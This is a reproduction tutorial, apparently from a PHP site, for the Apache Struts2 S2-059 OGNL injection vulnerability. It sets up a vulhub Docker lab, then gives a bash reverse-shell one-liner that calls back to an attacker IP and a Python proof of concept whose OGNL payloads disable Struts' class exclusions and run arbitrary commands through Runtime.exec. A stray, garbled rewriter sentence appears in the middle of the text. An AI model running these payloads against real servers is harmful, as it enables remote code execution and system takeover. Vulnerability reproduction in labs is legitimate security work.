Struts2 is a very powerful Java Web open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework structure. It is usually used as a controller to establish data interaction between models and views, and is used to create enterprise-level Java web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.
An attacker can construct a malicious OGNL expression and set it to be modified by external input, and the OGNL expression will be executed. The attribute value of the Struts2 tag triggers OGNL expression parsing, ultimately causing remote code execution.
Struts 2.0.0 – Struts 2.5.20
1. This vulnerability environment is quickly built using vulhub. The download address of vulhub is as follows:
https://github.com/vulhub/vulhub
cd vulhub-master/struts2/s2-059
2. Use docker-compose to quickly build a shooting range environment
docker-compose up -d
3. After the startup is completed, visit http://ip:8080/?id=1 in the browser and you can see the test interface
1. Visit http://ip:8080/?id=%{88*88} in the browser, you can find that the executed 88*88 is successfully parsed, and the OGNL expression will be executed. The attribute value of the Struts2 tag triggers OGNL expression parsing.
2. Use poc to rebound the shell. The payload of the rebound shell needs to be encoded in base64
bash -i >& /dev/tcp/172.16. 1.132/9967 0>&1
base64 encoded URL:
The original sentence is already a complete sentence that is providing a link. If I were to rewrite it, it could be something like: Here is a link to a webpage containing information about runtime exec payloads: http://www.jackson-t.ca/runtime-exec-payloads.html.
import requests url = "http://127.0.0.1:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}" } data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64编码'))}" } res1 = requests.post(url, data=data1) res2 = requests.post(url, data=data2) Copy after login |
3. Modify the payload in the poc to your own payload, and then run it using python, you can see that the shell bounces
The above is the detailed content of How does the Struts2 S2-059 remote code execution vulnerability reproduce?. For more information, please follow other related articles on the PHP Chinese website!